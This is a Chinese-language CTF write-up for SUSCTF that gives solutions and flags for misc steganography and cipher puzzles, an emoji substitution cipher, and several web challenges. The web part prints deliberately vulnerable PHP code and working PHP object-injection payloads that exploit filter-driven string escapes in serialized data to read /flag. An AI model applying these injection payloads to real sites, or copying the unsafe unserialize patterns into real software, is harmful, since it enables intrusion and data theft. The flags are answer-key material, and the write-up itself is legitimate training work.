前言 得到号的时候只剩半天时间了,断断续续做了一些题,有些web题环境关了来不及复现,buu见
MISC 签到 SUSCTF{Welcome_t0_SUSCTF}
调查问卷 SUSCTF{Thank_y0u_fOr_your_r3ply}
爆破鬼才请求出战 第一关,掩码爆破
图片
图片
第二关,LSB隐写
图片
第三关,栅栏密码
S{urgdt1}UY_30__sS0a_04mc
图片
SUS{Y0u_ar3_g00d_4t_m1sc}
签到之公众号 SUSCTF{W3lc0m3_t0_SUSCTF}
Dance_Dance 第一关,跳舞的小人密码
图片
根据在线网站 对出字符,举旗子的代表一个单词的结尾
图片
passwdLetU sdanCe
第二关,binwalk分离
图片
压缩包密码:LetUsdanCe
第三关,音频频谱二维码
图片
终究还是自己手画了出来
图片
SUS{1nt3r35t1nG_5p3ctRum}
ƃɐlɟ¯ʇuᴉɹԀ 将十六进制数据倒序,得到一个zip
zip里有一个txt和加密压缩包,对txt进行字频分析
图片
Mima:D0youkNOw3dpr1nt?
根据文件内容用到 Cura_SteamEngine 4.6.2 软件
是我没有的硬件,告辞
[萌]你还好吗? 在线网站 解ook密码
图片
Ar3_y0u_OK??
解压缩包得到图片,提示不够高,winhex改下高度
图片
SUS{wuhu_y0u_f1nD_m3}
[萌]fix_fo 拖进winhex修复文件头
图片
解压得到新佛曰密码
1 新佛曰:諸隸殿僧降殿吽殿諸陀摩隸僧缽薩殿願心殿薩殿咤伏殿聞莊摩咤殿諦殿如叻須降闍殿亦修我殿愍殿諸隸殿波如空殿如如囑囑殿
图片
SUS{Ta1k_w1th_F0}
抓住那只小老鼠 第一关,zip伪加密,只有一个包是伪加密
图片
解压得到keyboard流量包,粗略看了下是键盘敲击码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 00:00:13:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:04:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:16:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:16:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:1a:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:12:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:15:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:07:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:2c:00:00:00:00:00 00:00:00:00:00:00:00:00 02:00:00:00:00:00:00:00 02:00:33:00:00:00:00:00 02:00:00:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:2c:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:0f:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:20:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:17:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:2d:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:18:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:22:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:2d:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:0f:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:27:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:27:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:0e:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:2d:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:21:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:17:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:2d:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:17:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:0b:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:20:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:2d:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:15:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:1e:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:0a:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:0b:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:17:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:2d:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:05:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:18:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:17:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:17:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:27:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:11:00:00:00:00:00 00:00:00:00:00:00:00:00
图片
passwordl3t-u5-l00k-4t-th3-r1ght-butt0n
解不开那个压缩包,麻了
emoji真好玩 根据文件名,是个jpg的jphs加密,密码在emoji里
可以使用github上的脚本 解密
图片
password:C0de3moj1
使用密码对图片进行解密
图片
得到一个01字符串,文件名说把它画出来,猜测是01字符串转二维码
根据开方为245*245的二维码,跑脚本得到二维码图片
图片
SUS{1p0ch_wanNA_4_npy5}
小熊你咋带着品如的面具 看样子是要先取证iso再用获得的密码来用EncryptoforWin进行解密
CRYPTO [简单]嘤语 1 2 3 4 5 6 7 8 9 10 11 小Z在某站监听到一段加密对话: 😳😊⬜😇😏🤐😖😋🤩🧐😏🤣😖🥺🤐🔑⬜🤣⬜😇😠🤣🤪🤪😳😇🤣😠⬜😇😳😖🥺😍😏⬜😳🤪⬜🤣⬜😋🤐😖😍⬜🤩😆⬜😇😳😖🥺😍😏⬜😋🥺🤣😋⬜😴🤣🤪⬜😘🤪😍🙃⬜🥺😳🤪😋🤩😏😳😇🤣😠😠🤐⬜😅😘😋⬜😊🤩😴⬜🥺🤣🤪⬜😆🤣😠😠😍😊🔑⬜😆🤩😏⬜😋🥺😍⬜😭🤩🤪😋⬜😖🤣😏😋🔑⬜😳😊😋🤩⬜🙃😳🤪😘🤪😍⭕⬜😳😊⬜😇🤩😊😋😏🤣🤪😋⬜😋🤩⬜😭🤩🙃😍😏😊⬜😇😏🤐😖😋🤩🧐😏🤣😖🥺😳😇⬜🤣😠🧐🤩😏😳😋🥺😭🤪🔑⬜😭🤩🤪😋⬜😇😠🤣🤪🤪😳😇🤣😠⬜😇😳😖🥺😍😏🤪⬜😇🤣😊⬜😅😍⬜😖😏🤣😇😋😳😇🤣😠😠🤐⬜😇🤩😭😖😘😋😍🙃⬜🤣😊🙃⬜🤪🤩😠😮😍🙃⬜😅🤐⬜🥺🤣😊🙃⭕⬜🥺🤩😴😍😮😍😏🔑⬜😋🥺😍🤐⬜🤣😏😍⬜🤣😠🤪🤩⬜😘🤪😘🤣😠😠🤐⬜😮😍😏🤐⬜🤪😳😭😖😠😍⬜😋🤩⬜😅😏😍🤣😷⬜😴😳😋🥺⬜😭🤩🙃😍😏😊⬜😋😍😇🥺😊🤩😠🤩🧐🤐⭕⬜😋🥺😍⬜😋😍😏😭⬜😳😊😇😠😘🙃😍🤪⬜😋🥺😍⬜🤪😳😭😖😠😍⬜🤪🤐🤪😋😍😭🤪⬜😘🤪😍🙃⬜🤪😳😊😇😍⬜🧐😏😍😍😷⬜🤣😊🙃⬜😏🤩😭🤣😊⬜😋😳😭😍🤪🔑⬜😋🥺😍⬜😍😠🤣😅🤩😏🤣😋😍⬜😏😍😊🤣😳🤪🤪🤣😊😇😍⬜😇😳😖🥺😍😏🤪🔑⬜😴🤩😏😠🙃⬜😴🤣😏⬜😳😳⬜😇😏🤐😖😋🤩🧐😏🤣😖🥺🤐⬜🤪😘😇🥺⬜🤣🤪⬜😋🥺😍⬜😍😊😳🧐😭🤣⬜😭🤣😇🥺😳😊😍⬜🤣😊🙃⬜😅😍🤐🤩😊🙃⭕⬜🥺😍😏😍⬜😳🤪⬜🤐🤩😘😏⬜😆😠🤣🧐☯⬜🤪😘🤪😇😋😆🌘😍🤣🤪🤐⛔😏😍😖😠🤣😇😍⛔😇😏🤐😖😋🤩🌒⭕ 经过大量尝试,小Z勉强还原出一些特殊字符: ⭕ => . ☯ => : 🔑 => , ⛔ => _ 🌘 => { 🌒 => } 你能帮帮他吗? 注:flag均为大写
找到了编码表 和解密网站 ,但这题用不到
1 2 3 4 🤪😘🤪😇😋😆 SUSCTF 🌘😍🤣🤪🤐⛔😏😍😖😠🤣😇😍⛔😇😏🤐😖😋🤩🌒 SUSCTF{**S*_*****C*_C***T*}
又比如英语中比较常见的THE,IS等,根据已知的emoji和语句意进行猜测1 2 3 4 5 6 7 8 9 10 11 12 😋🥺😍 THE 😳🤪 IS 😆😠🤣🧐☯ FLAG: 😋🥺😍🤐 THEY 😋🤐😖😍 TYPE 更新后的flag SUSCTF{EASY_REPLACE_CRYPTE}
WEB Sign_in 抓包改post传参
图片
SUSCTF{397d79b4fd5bb85d73d86742dfdf223d}
AT_Field 修改可以输入的字符长度,输入flag并提交
图片
SUSCTF{0e808712e2a814fe0cd126e09159226a}
Script_Kiddle 抓个包爆破,需要缘分
图片
SUSCTF{24bf10b0f61c19e10a631e4c603127b2}
first_lesson 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 <?php highlight_file(__FILE__ ); if (isset ($_GET["z33" ])){ echo "<p>z33 is " . $_GET['z33' ] . "</p>" ;if ($_GET["z33" ] === "feiwu" ){ if (isset ($_GET["rmb" ])){ echo "<p>rmb is " . $_GET["rmb" ] . "</p>" ;if ($_GET["rmb" ] === "shenxian" ){ if (isset ($_POST["aa" ])){ echo "<p>aa is dage of " . $_POST["aa" ] . "</p>" ;if ($_POST["aa" ] === "z33&rmb" ){ echo file_get_contents("/flag" );} } else { echo "<p>use POST method to submit aa</p>" ;} } } else { echo "<p>use GET method to submit rmb</p>" ;} } } else { echo "<p>use GET method to submit z33</p>" ;}
图片
SUSCTF{so_who_is_AA}
刀来!
图片
SUSCTF{f5f397a37b728d927576ae889b908d17}
Ez_escape1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 <?php highlight_file(__file__ ); $name=$_POST["name" ]; $number=10086 ; class escape public $name;public $number;public function __construct ($name,$number) $this ->name=$name;$this ->number=$number;} } function filter ($string) return str_replace('nzgnb' ,'nzgyyds' ,$string);} $epoch=filter(serialize(new escape($name,$number))); echo $epoch."<br>" ;$ep0ch=unserialize($epoch); if ($ep0ch->number===1008611 ) {echo base64_encode(file_get_contents("/flag" ));} else {echo "try again" ;}
nzgnb被替换成nzgyyds逃逸2个字符,需要传入的数据长度是26,name传入13个nzgnb即可逃逸1 2 {s:4:"name";s:91:"nzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyyds";s:6:"number";i:1008611;}";s:6:"number";i:10086;} U1VTQ1RGe2MyYmQyOWRiNDk1N2JmODBjM2M5OWRlMTliZDRhNjBkfQ==
SUSCTF{c2bd29db4957bf80c3c99de19bd4a60d}
Ez_escape2 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 <?php highlight_file(__file__ ); $haidilao=$_POST["haidilao" ]; $core=$_POST["core" ]; $num="2019" ; class escape2 public $haidilao;public $core;public $num;public function __construct ($haidilao,$core,$num) $this ->haidilao=$haidilao;$this ->core=$core;$this ->num=$num;} public function __wakeup () if ($this ->num==="2020" ) {echo base64_encode(file_get_contents("/flag" ));} else {echo "try again" ;} } } function filter ($string) return str_replace('Haidilao' ,'Hedilao' ,$string);} $btis=filter(serialize(new escape2($haidilao,$core,$num))); echo "<br>" .$btis."<br>" ;$bt15=unserialize($btis);
根据过滤后字符串减少的原理,使core传入构造代码1 2 3 O:7 :"escape2" :3 :{s:8 :"haidilao" ;s:8 :"Hedilao" ;s:4 :"core" ;s:1 :"1" ;s:3 :"num" ;s:4 :"2019" ;} ";s:4:" core";s:1:" ";s:4:" core";s:1:" 1 ";s:3:" num";s:4:" 2020 ";} # 需要传输的core的值
截止到core的值共19个字符,即传入19个Haidilao,替换成Hedilao后吞掉19个字符,使后面的payload补上1 2 haidilao=HaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilao HaidilaoHaidilaoHaidilaoHaidilao&core=";s:4:"core";s:3:"123";s:3:"num";s:4:"2020";}
AA_is_who 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 <?php highlight_file(__FILE__ ); class AA public $name;protected $power;public function __destruct () if ($this ->name === "Aryb1n" ){ echo "AA is Aryb1n" ;if ($this ->power > 100000 ){ echo "AA is powerful" ;echo file_get_contents("/flag" );} else { echo "AA is not so weak" ;} } else { echo "who is AA?" ;} } } $aa = $_GET["aa" ]; unserialize($aa);
get接受aa变量的传参,要求$power的值大于100000,$name的值为Aryb1n,使代码序列化
1 2 3 4 5 6 7 8 9 10 11 <?php class AA public $name=Aryb1n; protected $power=1000000 ; } $a=new AA(); print serialize($a);print urlencode(serialize($a));?>
图片
